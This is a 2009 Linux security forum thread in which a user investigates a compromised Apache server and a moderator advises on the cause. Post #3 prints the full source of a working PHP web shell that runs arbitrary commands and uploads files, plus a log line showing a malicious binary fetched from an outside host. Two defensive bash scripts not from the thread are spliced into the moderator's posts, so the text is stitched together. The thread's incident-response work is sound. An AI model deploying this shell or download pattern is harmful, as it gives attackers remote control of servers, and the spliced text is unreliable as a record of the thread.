Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 08-05-2009, 05:56 PM   #1
stardotstar
Member
 
Registered: Nov 2002
Location: /au/qld/bne/4157
Distribution: Gentoo mactel-linux
Posts: 238

Rep: Reputation: 30
fallout from exploit - please explain the AddHandler cgi-script in .htdocs


Hi Guys,

Been attacked - rather efficiently and effectively actually.
I had a world writable folder in a well known GPL application (and images folder) that turned out to contain several malicious binaries, php scripts and configs.

The attack was from sources unknown to me (but my logs have the source of the uploads) and the target was a neighbouring host so the data that got shipped when the scripts fired was massive.

Anyway, I have been reading around on ways of tightening my security, which is by no means inadequate in many ways.

I have .htaccess with directory listing prohibited

Code:
Options -Indexes
and I have been advised to use this in my world writable directories - for uploaded attachments/avatars etc etc

Code:
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi
Options -ExecCGI
I have had a look at the apache docs about this but I am unsure as to how it makes the site more secure from outside attack, especially when the attack is by a script uploaded to the localhost and then triggered to run from there...

Best regards and TIA
\\'
 
Old 08-06-2009, 01:42 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Quote:
Originally Posted by stardotstar View Post
I had a world writable folder in a well known GPL application (and images folder) that turned out to contain several malicious binaries, php scripts and configs.
Unless you deleted those without looking, can I ask for a copy of contents?


Quote:
Originally Posted by stardotstar View Post
I am unsure as to how it makes the site more secure from outside attack, especially when the attack is by a script uploaded to the localhost and then triggered to run from there...
I don't understand either. To me this says "Override configured (ScriptAlias) directives for this directory and force files with these extensions to be executed as a CGI in this directory", so if somebody uploads a shell script or PHP shell all they have to do is access the URI to be able to use it.

More importantly you allow world writable directories which might make some things easier (as you know by now) but is a bad thing. I'd suggest you fix that first.
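As an added example that is not code from the thread, a bash audit of an upload directory for the two conditions discussed above: the world-writable bit and an .htaccess that maps uploaded extensions to cgi-script. While Options -ExecCGI is in force mod_cgi answers requests for such files with a 403, so the pair quoted in the first post blocks execution only for as long as nothing re-enables ExecCGI; the hardened .htaccess written into the second demo directory does not rely on that interaction. The demo directory names and the hardened .htaccess are constructed; the weak .htaccess is the one from the first post.

```shell
#!/bin/bash
# Added example, not code from the thread: audit an upload directory for the
# two conditions discussed above, the world-writable bit that let the files in
# and an .htaccess that maps uploaded extensions to cgi-script.
# Needs GNU find/coreutils as found on a typical Linux host.

# Print one line per finding for DIR; callers count the lines.
audit_upload_dir() {
    local dir="$1" ht="$1/.htaccess"

    # 1. World-writable directory: any local user, and any vulnerable web app
    #    running as the Apache user, can drop files here.
    if [ -n "$(find "$dir" -maxdepth 0 -type d -perm -002)" ]; then
        echo "WORLD_WRITABLE  $dir"
    fi

    # 2. Uploaded files handed to mod_cgi. mod_cgi refuses them with a 403 while
    #    ExecCGI is off, so this only holds as long as nothing re-enables
    #    ExecCGI; flag it so the dependency is visible.
    if [ -f "$ht" ] && grep -Eiq '^[[:space:]]*(Add|Set)Handler[[:space:]]+cgi-script' "$ht"; then
        echo "CGI_HANDLER     $ht"
    fi

    # 3. ExecCGI not explicitly removed for this directory.
    if ! { [ -f "$ht" ] && grep -Eiq '^[[:space:]]*Options[[:space:]].*-ExecCGI' "$ht"; }; then
        echo "EXECCGI_ALLOWED $dir"
    fi

    # 4. mod_php engine still on. The ps listing shows apache2 started with
    #    -D PHP5, so a .php dropped here runs unless the engine is off.
    if ! { [ -f "$ht" ] && grep -Eiq '^[[:space:]]*php_flag[[:space:]]+engine[[:space:]]+off' "$ht"; }; then
        echo "PHP_ENGINE_ON   $dir"
    fi
}

# Number of findings for DIR; 0 means clean.
audit_count() {
    audit_upload_dir "$1" | wc -l | tr -d ' '
}

# Constructed demo: WEAK_DIR gets the .htaccess quoted in the first post and
# mode 777; SAFE_DIR gets mode 755 and a policy that never executes anything.
make_demo_dirs() {
    local base
    base=$(mktemp -d)
    WEAK_DIR="$base/images"
    SAFE_DIR="$base/avatars"
    mkdir -p "$WEAK_DIR" "$SAFE_DIR"
    chmod 777 "$WEAK_DIR"
    chmod 755 "$SAFE_DIR"
    cat > "$WEAK_DIR/.htaccess" <<'EOF'
Options -Indexes
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi
Options -ExecCGI
EOF
    # Hardened variant in Apache 2.2 syntax (the era of the thread): serve
    # everything as static data, keep PHP and CGI away from it, and refuse to
    # serve script extensions at all. php_flag needs mod_php to be loaded.
    cat > "$SAFE_DIR/.htaccess" <<'EOF'
Options -Indexes -ExecCGI -Includes
RemoveHandler .php .php3 .php4 .phtml .pl .py .cgi .sh .shtml
SetHandler default-handler
php_flag engine off
<FilesMatch "\.(php|php3|php4|phtml|pl|py|cgi|sh|shtml)$">
    Order allow,deny
    Deny from all
</FilesMatch>
EOF
}

make_demo_dirs
echo "--- $WEAK_DIR"; audit_upload_dir "$WEAK_DIR"
echo "--- $SAFE_DIR"; audit_upload_dir "$SAFE_DIR"
```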
 
Old 08-06-2009, 06:54 AM   #3
stardotstar
Member
 
Registered: Nov 2002
Location: /au/qld/bne/4157
Distribution: Gentoo mactel-linux
Posts: 238

Original Poster
Rep: Reputation: 30
yes, unSpawn, the world writable thing is the thing.

I have all the stuff from the attack.

Can I publish the php scripts here?

The munitions seem to be:

Code:
helios exploit # ./httpd --help
./httpd: invalid option -- '-'

iroffer v1.4.b01 [20040901211948] by PMG, see http://iroffer.org/

(..)
helios exploit # ./x --help
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002
...follows:

Code:
helios exploit # cat murqdh.php 
<
and a large and evil looking script that begins thus:
Code:
helios exploit # cat rfrcew.php
This combination seems to have unleashed a torrent of data initiated by my server against a very neighboring one (one route away) that expended 40G in less than 5 min, the host noticed and took my ports offline.
I monitored top and netstat to see if I could work out what was going on before I started stopping things... (ssh'd via my iLO)

apache was full throttle:
Code:
top - 19:54:25 up 29 days, 21:20,  1 user,  load average: 1.00, 1.01, 1.00
Tasks: 127 total,   2 running, 124 sleeping,   0 stopped,   1 zombie
Cpu(s):  0.0%us, 50.0%sy,  0.0%ni, 50.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   3630412k total,  2963236k used,   667176k free,   524328k buffers
Swap:  1959920k total,      156k used,  1959764k free,  1771116k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND            
16043 apache    20   0  1768  304  188 R  165  0.0  78:29.10 httpd              
    1 root      20   0  1636  544  476 S    0  0.0   0:17.67 init               
    2 root      15  -5     0    0    0 S    0  0.0   0:00.00 kthreadd           
    3 root      RT  -5     0    0    0 S    0  0.0   0:03.05 migration/0        
    4 root      15  -5     0    0    0 S    0  0.0   3:31.88 ksoftirqd/0        
    5 root      RT  -5     0    0    0 S    0  0.0   0:04.58 watchdog/0         
    6 root      RT  -5     0    0    0 S    0  0.0   0:01.35 migration/1        
    7 root      15  -5     0    0    0 S    0  0.0   3:18.87 ksoftirqd/1        
    8 root      RT  -5     0    0    0 S    0  0.0   0:00.17 watchdog/1         
    9 root      RT  -5     0    0    0 S    0  0.0   0:02.83 migration/2        
   10 root      15  -5     0    0    0 S    0  0.0   3:18.46 ksoftirqd/2        
   11 root      RT  -5     0    0    0 S    0  0.0   0:00.16 watchdog/2         
   12 root      RT  -5     0    0    0 S    0  0.0   0:01.25 migration/3        
   13 root      15  -5     0    0    0 S    0  0.0   3:03.70 ksoftirqd/3        
   14 root      RT  -5     0    0    0 S    0  0.0   0:00.15 watchdog/3         
   15 root      15  -5     0    0    0 S    0  0.0   0:14.90 events/0           
   16 root      15  -5     0    0    0 S    0  0.0   0:17.40 events/1           
   17 root      15  -5     0    0    0 S    0  0.0   0:13.38 events/2
BTW that is probably 100% with the watch chopping off at %65.
I stopped apache2 and went looking for recent files:
Code:
find /var/www/ -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort
this showed the offending files straight away modified at the start of the attack - they didn't plant and wait - they must have dumped the munitions and initiated the sequence immediately.
Once I saw the httpd bin I knew it would show in the apache logs
Code:
helios apache2 # grep httpd ./*
./error_log:==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 5908
./error_log:--2009-08-05 18:20:33--  http://lichno.net/step/phpThumb/cache/a/ad/a/httpd
./error_log:Saving to: `httpd'
./error_log:2009-08-05 18:20:54 (15.1 KB/s) - `httpd' saved [306414/306414]
and there it was at the time of the launch of the attack...
Finally here is the process list at the time the attack was going (but disconnected)
Code:
helios logs-n-snips # cat ps 
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1636   544 ?        Ss   Jul06   0:17 init [3]  
root         2  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   Jul06   0:03 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   Jul06   3:31 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Jul06   0:04 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   Jul06   0:01 [migration/1]
root         7  0.0  0.0      0     0 ?        S<   Jul06   3:18 [ksoftirqd/1]
root         8  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/1]
root         9  0.0  0.0      0     0 ?        S<   Jul06   0:02 [migration/2]
root        10  0.0  0.0      0     0 ?        S<   Jul06   3:18 [ksoftirqd/2]
root        11  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/2]
root        12  0.0  0.0      0     0 ?        S<   Jul06   0:01 [migration/3]
root        13  0.0  0.0      0     0 ?        S<   Jul06   3:03 [ksoftirqd/3]
root        14  0.0  0.0      0     0 ?        S<   Jul06   0:00 [watchdog/3]
root        15  0.0  0.0      0     0 ?        S<   Jul06   0:14 [events/0]
root        16  0.0  0.0      0     0 ?        S<   Jul06   0:17 [events/1]
root        17  0.0  0.0      0     0 ?        S<   Jul06   0:13 [events/2]
root        18  0.0  0.0      0     0 ?        S<   Jul06   0:17 [events/3]
root        19  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khelper]
root       106  0.0  0.0      0     0 ?        S<   Jul06   0:02 [kblockd/0]
root       107  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/1]
root       108  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/2]
root       109  0.0  0.0      0     0 ?        S<   Jul06   0:01 [kblockd/3]
root       111  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kacpid]
root       112  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kacpi_notify]
root       186  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/0]
root       187  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/1]
root       188  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/2]
root       189  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata/3]
root       190  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ata_aux]
root       191  0.0  0.0      0     0 ?        S<   Jul06   0:00 [ksuspend_usbd]
root       196  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khubd]
root       199  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kseriod]
root       258  0.0  0.0      0     0 ?        S    Jul06   2:53 [pdflush]
root       259  0.0  0.0      0     0 ?        S<   Jul06   0:11 [kswapd0]
root       300  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/0]
root       301  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/1]
root       302  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/2]
root       303  0.0  0.0      0     0 ?        S<   Jul06   0:00 [aio/3]
root       998  0.0  0.0      0     0 ?        S<   Jul06   0:00 [khpsbpkt]
root      1039  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kpsmoused]
root      1043  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kstriped]
root      1045  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/0]
root      1046  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/1]
root      1047  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/2]
root      1048  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kondemand/3]
root      1060  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/0]
root      1061  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/1]
root      1062  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/2]
root      1063  0.0  0.0      0     0 ?        S<   Jul06   0:00 [rpciod/3]
root      1071  0.0  0.0      0     0 ?        S<   Jul06   1:24 [kjournald]
root      1175  0.0  0.0   1896   604 ?        S<s  Jul06   0:09 /sbin/udevd --daemon
root      2251  0.0  0.0      0     0 ?        S<   Jul06   3:54 [kjournald]
root      2252  0.0  0.0      0     0 ?        S<   Jul06   0:00 [kjournald]
root      2253  0.0  0.0      0     0 ?        S<   Jul06   0:04 [kjournald]
root      2875  0.0  0.0   3456  1340 ?        Ss   Jul06   0:49 /usr/sbin/syslog-ng
amavis    4010  0.0  1.4  60168 51516 ?        Ss   Jul06   0:25 amavisd (master)
root      4356  0.0  0.0   4204   912 ?        Ss   Jul06   0:00 /usr/sbin/sshd
root      4532  0.0  0.0   1904   708 ?        Ss   Jul06   0:02 /usr/sbin/cron
clamav    4647  0.0  3.5 155604 127988 ?       SNsl Jul13   9:42 /usr/sbin/clamd
clamav    4657  0.0  0.0   3048  1400 ?        SNs  Jul13   0:04 /usr/bin/freshclam -d
apache    4835  0.0  0.3  25456 13516 ?        S    17:46   0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
mysql     5576  6.6  1.9 188284 69712 ?        Ssl  Jul06 2875:49 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root      5719  0.0  0.0   1620   408 ?        S    Jul06   0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond
root      5720  0.0  0.0   5276  1228 ?        S    Jul06   0:00 /usr/lib/courier/courier-authlib/authdaemond
root      5724  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5725  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5726  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5727  0.0  0.0   5500  1440 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5728  0.0  0.0   5500  1436 ?        S    Jul06   0:02 /usr/lib/courier/courier-authlib/authdaemond
root      5792  0.0  0.0   1716   524 ?        S    Jul06   0:02 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/courier-imapd.indirect Maildir
root      5795  0.0  0.0   1620   476 ?        S    Jul06   0:02 /usr/lib/courier-imap/courierlogger imapd
root      5856  0.0  0.0   1716   516 ?        S    Jul06   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/courier-pop3d.indirect .maildir
root      5859  0.0  0.0   1488   320 ?        S    Jul06   0:00 /usr/lib/courier-imap/courierlogger pop3d
apache    5908  0.0  0.0      0     0 ?        Z    17:48   0:00 [httpd] <defunct>
apache    5909  0.0  0.0   1768   640 ?        S    17:48   0:00 [httpd]                          
root      5914  0.0  0.0   1844   468 ?        Ss   Jul06   0:00 /usr/sbin/gpm -m /dev/input/mice -t ps2
root      6237  0.3  0.0 100576  1040 ?        Ssl  Jul06 132:51 hpasmd
root      6278  0.0  0.0   2492  1412 ?        S    Jul06   0:14 cmathreshd -p 5 -s OK
root      6282  0.0  0.0  10624  1376 ?        S    Jul06  12:19 cmahostd -p 15 -s OK
root      6287  0.0  0.0  10692  1240 ?        Sl   Jul06   0:02 cmapeerd
root      6327  0.0  0.0  18332   916 ?        Sl   Jul06   0:18 cmastdeqd -p 30
root      6334  0.0  0.0  51148   844 ?        Sl   Jul06   2:24 cmahealthd -p 30 -s OK -t OK -i
root      6474  0.0  0.0  10092   788 ?        S    Jul06   0:05 cmaided -p 15 -s OK
root      6482  0.0  0.0   1880   596 ?        S    Jul06   0:01 cmascsid -p 15 -s OK
root      6499  0.0  0.0   1868   564 ?        S    Jul06   0:01 cmasasd -p 15 -s OK
106       7126  0.3  0.4  43868 17344 ?        Ssl  Jul06 131:23 /usr/bin/memcached -d -p 11211 -l 127.0.0.1 -m 512 -c 1024 -u memcached -P /var/run/memcached/memcached-11211.pid
ntop      7186  0.3  1.2 122724 43984 ?        Ssl  Jul06 170:41 /usr/bin/ntop -d -L -u ntop -P /var/lib/ntop
root      7350  0.0  0.0   2064   524 ?        Ss   Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7351  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7352  0.0  0.0   2064   488 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7353  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root      7354  0.0  0.0   2064   484 ?        S    Jul06   0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
amavis    7400  0.0  1.4  62828 53656 ?        S    15:59   0:02 amavisd (ch7-avail)
root      7416  0.0  0.7  30012 27724 ?        Ss   Jul06   5:42 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H
root      7584  0.0  0.7  30012 25992 ?        S    Jul06   0:01 spamd child
root      7585  0.0  0.7  30012 25900 ?        S    Jul06   0:02 spamd child
apache    9392  0.1  0.3  27060 13772 ?        S    18:28   0:07 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root      9493  0.0  0.1  18308  5984 ?        Sl   Jul06   4:10 /usr/sbin/snmpd -p /var/run/snmpd.pid
root      9616  0.0  0.0   2596  1240 tty1     Ss   Jul06   0:00 /bin/login --            
root      9617  0.0  0.0   1632   460 tty2     Ss+  Jul06   0:00 /sbin/agetty 38400 tty2 linux
root      9618  0.0  0.0   1632   456 tty3     Ss+  Jul06   0:00 /sbin/agetty 38400 tty3 linux
root      9619  0.0  0.0   1632   460 tty4     Ss+  Jul06   0:00 /sbin/agetty 38400 tty4 linux
root      9620  0.0  0.0   1632   464 tty5     Ss+  Jul06   0:00 /sbin/agetty 38400 tty5 linux
root      9621  0.0  0.0   1632   460 tty6     Ss+  Jul06   0:00 /sbin/agetty 38400 tty6 linux
apache   10292  0.0  0.3  24664 12780 ?        S    18:29   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root     10673  0.0  0.0   7012  1812 ?        Ss   Jul07   0:33 /usr/lib/postfix/master
postfix  10677  0.0  0.0   7348  2164 ?        S    Jul07   0:17 qmgr -l -t fifo -u
apache   12108  0.0  0.3  24548 12684 ?        S    18:31   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   12505  0.0  0.3  24528 12644 ?        S    18:32   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   12686  0.1  0.3  25048 13200 ?        S    18:32   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   13889  0.1  0.3  24988 13092 ?        S    18:33   0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
amavis   14711  0.0  1.6  69208 60208 ?        S    12:36   0:06 amavisd (ch19-avail)
apache   15948  0.0  0.3  27176 14220 ?        S    18:35   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   16020  0.0  0.3  24792 12896 ?        S    18:35   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache   16043 99.9  0.0   1768   304 ?        R    18:35  69:33 [httpd]                          
apache   16221  0.0  0.3  24640 12764 ?        S    18:38   0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
postfix  16745  0.0  0.0   7056  1744 ?        S    18:53   0:00 pickup -l -t fifo -u
apache   17268  0.0  0.3  23924 11988 ?        S    19:10   0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
1000     18266  0.0  0.0   3008  1572 tty1     S    19:42   0:00 -bash
root     18302  0.0  0.0   2488  1152 tty1     S    19:43   0:00 su
root     18303  0.0  0.0   2880  1588 tty1     S    19:43   0:00 bash
postfix  18370  0.0  0.0   7196  2000 ?        S    19:44   0:00 smtp -t unix -u
root     18389  0.0  0.0   2276   888 tty1     R+   19:45   0:00 ps aux
root     28969  0.0  0.0      0     0 ?        S    Aug03   0:16 [pdflush]
root     29674  0.0  0.3  22204 11516 ?        Ss   Jul07  22:40 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
named    29761  0.0  0.5  22592 19764 ?        Ss   Jul07   4:38 /usr/sbin/named -u named -n 4 -t /var/chroot/dns
nobody   29798  0.0  0.0   6336  1440 ?        Ss   Jul23   0:16 proftpd: (accepting connections)
Thanks for your interest unSpawn.

Cheers,
\\'

oh and one more I missed:
Code:
helios exploit # cat errors.php 
<body bgcolor="#C0C0C0">Carnivores Team We Own The Net!
<?php

set_magic_quotes_runtime(0);

print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>Team Carnivores</h1></center>";
print "<hr><hr>";

$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "</table>";

print "<hr><hr>";

if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -la";
}

print "<form method=post enctype=\"multipart/form-data\"><table>";

print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";

print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";

print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>fuckers blocked us try again!</b></center>";
    } else {
        print "<center><pre>";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded baby good work!</b></center>";
    }    
} else {
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
    system($currentCMD);
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>ownd Baby</b></center>";
}

exit;

?>

helios exploit #

Last edited by unSpawn; 08-06-2009 at 07:15 AM. Reason: //rm code, tidy up.
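As an added example that is not code from the thread, a bash scanner for the three kinds of trace visible in the error_log excerpt above: wget's start banner, wget's completion line and XHide's "Fakename:" banner, which all ended up in error_log because the process that printed them ran under Apache. The sample log is constructed and the download host is a placeholder; timestamps and file name follow the grep output quoted in the post.

```shell
#!/bin/bash
# Added example, not code from the thread: pull fetch-and-run traces out of an
# Apache error_log. In the post above, wget's progress output and XHide's
# "Fakename:" banner landed in error_log because the shell that launched them
# ran under Apache, whose stderr is that file.

# Three trace types as POSIX EREs for bash's =~ operator.
RE_FETCH='--([0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2})--  (https?://[^[:space:]]+)'
RE_SAVED="- \`([^']+)' saved \[([0-9]+)/([0-9]+)\]"
RE_FAKE='Fakename: (.+) PidNum: ([0-9]+)'

# Read an error_log on stdin; print one finding per matching line, nothing for
# ordinary Apache notices and errors.
scan_error_log() {
    local line state
    while IFS= read -r line; do
        if [[ $line =~ $RE_FETCH ]]; then
            # Download started: when and from where. The URL is the first
            # indicator to block and to look for in the access logs.
            echo "FETCH    ${BASH_REMATCH[1]}  ${BASH_REMATCH[2]}"
        elif [[ $line =~ $RE_SAVED ]]; then
            # Download finished: local file name and whether all bytes arrived.
            state=partial
            if [ "${BASH_REMATCH[2]}" = "${BASH_REMATCH[3]}" ]; then
                state=complete
            fi
            echo "SAVED    ${BASH_REMATCH[1]}  ${BASH_REMATCH[2]} bytes ($state)"
        elif [[ $line =~ $RE_FAKE ]]; then
            # Process faker announcing the argv it shows in ps; during triage,
            # compare that PID's /proc/PID/exe with the claimed binary.
            echo "PROCFAKE pid ${BASH_REMATCH[2]} claims argv '${BASH_REMATCH[1]}'"
        fi
    done
}

# Constructed sample log: the wget and XHide lines mirror the grep output quoted
# above, with the download host replaced by a placeholder.
SAMPLE_LOG=$(printf '%s\n' \
    '[Wed Aug 05 18:10:02 2009] [notice] Apache configured -- resuming normal operations' \
    '--2009-08-05 18:20:33--  http://example.invalid/cache/a/ad/a/httpd' \
    'Resolving example.invalid... 192.0.2.10' \
    "Saving to: \`httpd'" \
    "2009-08-05 18:20:54 (15.1 KB/s) - \`httpd' saved [306414/306414]" \
    '==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 5908' \
    '[Wed Aug 05 18:35:40 2009] [error] [client 192.0.2.77] File does not exist: /var/www/favicon.ico')

# Findings for the sample: FETCH, SAVED and PROCFAKE, one line each.
demo_findings() {
    printf '%s\n' "$SAMPLE_LOG" | scan_error_log
}

demo_findings
```

On a live box the same function runs as `scan_error_log < /var/log/apache2/error_log`.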
 
Old 08-06-2009, 07:17 AM   #4
stardotstar
Member
 
Registered: Nov 2002
Location: /au/qld/bne/4157
Distribution: Gentoo mactel-linux
Posts: 238

Original Poster
Rep: Reputation: 30
UnSpawn, thx for cleaning up - I chopped those code blocks some due to the blobs in them - if you want the bzip of everything I can send u.
Will
 
Old 08-06-2009, 07:28 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Quote:
Originally Posted by stardotstar View Post
I have all the stuff from the attack. Can I publish the php scripts here?
I'd rather have (the D/L location of) a tarball if that's possible for you. Else let's handle this part by email, OK?


Quote:
Originally Posted by stardotstar View Post
The munitions seem to be:
iroffer v1.4.b01
XHide - Process Faker
murqdh.php
rfrcew.php
(more PHP shells)
Even without more detail this looks like a typical toolkit: some PHP shells to make things easy, std bot, std process hider. I think you handled it pretty quick and from the looks of it pretty good. Point now is finding what conf/SW allowed them access. What runs on top of Apache?


BTW I cleaned up your code, best not leave stuff like that in the open.
 
Old 08-06-2009, 07:06 PM   #6
stardotstar
Member
 
Registered: Nov 2002
Location: /au/qld/bne/4157
Distribution: Gentoo mactel-linux
Posts: 238

Original Poster
Rep: Reputation: 30
Thanks mate, I appreciate your expertise in helping me not overexpose my server when trying to provide enough info to help me out.

I will move the tarball to somewhere I can point you to, or I will email it.

Cheers,
\\'
 
Old 08-06-2009, 08:06 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

